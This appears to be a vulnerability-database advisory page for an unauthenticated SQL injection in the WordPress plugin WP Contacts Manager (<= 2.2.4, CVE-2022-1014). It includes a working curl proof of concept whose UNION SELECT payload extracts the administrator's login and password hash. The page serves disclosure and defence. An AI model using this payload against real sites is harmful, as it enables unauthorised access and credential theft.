Lucene search
CydaveWPEX-ID:EB9E202D-04AA-4343-86A2-4AA2EDAA7F6BHistoryMay 02, 2022 - 12:00 a.m.
WP Contacts Manager <= 2.2.4 - Unauthenticated SQLi
2022-05-0200:00:00
cydave
142
0.002 Low
EPSS
Percentile
54.5%
The plugin fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to an SQL injection vulnerability.
curl 'http://127.0.0.1:8080/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'Related
patchstack
patchstack
prion
prion
Sql injection
2022-05-23 08:16:00
nvd
nvd
CVE-2022-1014
2022-05-23 08:16:06
wpvulndb
wpvulndb
WP Contacts Manager <= 2.2.4 - Unauthenticated SQLi
2022-05-02 00:00:00
cve
cve
CVE-2022-1014
2022-05-23 08:16:06
cvelist
cvelist
CVE-2022-1014 WP Contacts Manager <= 2.2.4 - Unauthenticated SQLi
2022-05-23 07:15:23